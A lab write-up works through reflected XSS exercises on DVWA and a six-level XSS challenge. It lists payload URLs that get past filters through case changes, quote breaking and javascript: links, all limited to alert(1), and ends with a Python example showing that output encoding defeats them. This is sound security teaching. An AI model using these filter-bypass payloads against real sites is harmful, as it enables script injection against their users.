0502 XSS Lab
0x01 dvwa xss(reflected)
1.1 Security Level: low
Use the typical <script>alert(1)</script> payload to trigger the alert pop-up:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script>

1.2 Security Level: medium
- The same test as above does not work:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<script>alert(1)</script>
- Change the URL as below, and it works:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<Script>alert(1)</script>
- Alternative way:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<a onclick="alert(1)">click me</a>
1.3 Security Level: high
Test with the payload below, and it works:
http://n00p.me/dvwa/vulnerabilities/xss_r/?name=<a onclick="alert(1)">click me</a>

0x02 xss challenge
2.1 level 1
payload: http://n00p.me/xss/level1.php?name=<script>alert(1)</script>

2.2 level 2
Test the typical payload, and notice this line in the source code:
<input name=keyword value="<script>alert(1)</script>">
Try to close the double quote; this is the payload:
n00p.me/xss/level2.php?keyword=a" onclick=alert(1) id=" &submit=搜索

2.3 level 3
Same as level 2, except that the double quote becomes a single quote:
n00p.me/xss/level3.php?keyword=a' onclick=alert(1) id=' &submit=搜索

2.4 level 4
same as level 2

2.5 level 5
View the source code and notice that script has been altered:
<input name=keyword value="<scr_ipt>alert(1)</script>">
Take a different path, as below:
http://n00p.me/xss/level5.php?keyword= a"><a href=javascript:alert(1)>bbb</a> <" &submit

2.6 level 6
View the source code and notice that href has been altered:
<input name=keyword value=" a"><a hr_ef=javascript:alert(1)>bbb</a> <" ">
Change the letter case of href, for example hRef:
n00p.me/xss/level6.php?keyword= a"><a hRef=javascript:alert(1)>bbb</a> <" &submit
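
Why the filters seen in sections 1.2, 2.5 and 2.6 let these inputs through, and what output encoding changes, as an added example (not code from DVWA or the challenge site). The filter is an assumed model inferred from the rewritten output shown above (scr_ipt, hr_ef), the three templates are assumed output contexts, and all function and class names are hypothetical.

```python
import html
from html.parser import HTMLParser

# Assumed output contexts: HTML text, double- and single-quoted attribute.
BODY = '<pre>Hello %s</pre>'
ATTR_DQ = '<input name="keyword" value="%s">'
ATTR_SQ = "<input name='keyword' value='%s'>"
URL_ATTRS = ('href', 'src', 'action', 'formaction')
# Payloads quoted from the write-up, paired with the context they target.
CASES = [
    (BODY, '<script>alert(1)</script>'),
    (BODY, '<Script>alert(1)</script>'),
    (BODY, '<a onclick="alert(1)">click me</a>'),
    (ATTR_DQ, 'a" onclick=alert(1) id="'),
    (ATTR_SQ, "a' onclick=alert(1) id='"),
    (ATTR_DQ, ' a"><a href=javascript:alert(1)>bbb</a> <"'),
    (ATTR_DQ, ' a"><a hRef=javascript:alert(1)>bbb</a> <"'),
]

def blacklist_filter(value):
    """Assumed model of the observed filters: case-sensitive literal rewrites."""
    return value.replace('<script', '<scr_ipt').replace('href', 'hr_ef')

def encode_output(value):
    """Fix for HTML text and quoted attributes: escape & < > " and '."""
    return html.escape(value, quote=True)

class ActiveContent(HTMLParser):
    """Records script tags, on* handlers and javascript: URLs after parsing."""
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        if tag == 'script':
            self.findings.append('script tag')
        for name, val in attrs:
            js_url = name in URL_ATTRS and (val or '').lower().startswith('javascript:')
            if name.startswith('on') or js_url:
                self.findings.append('%s=%s' % (name, val))

def audit(sanitize):
    """Render every case with `sanitize` applied and list the active content found."""
    results = []
    for template, payload in CASES:
        parser = ActiveContent()
        parser.feed(template % sanitize(payload))
        parser.close()
        results.append(parser.findings)
    return results
```

audit(blacklist_filter) returns an empty list only for the two inputs that match the filter's literals exactly, while audit(encode_output) returns an empty list for every case because the input can no longer leave the text or attribute value it was written into.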



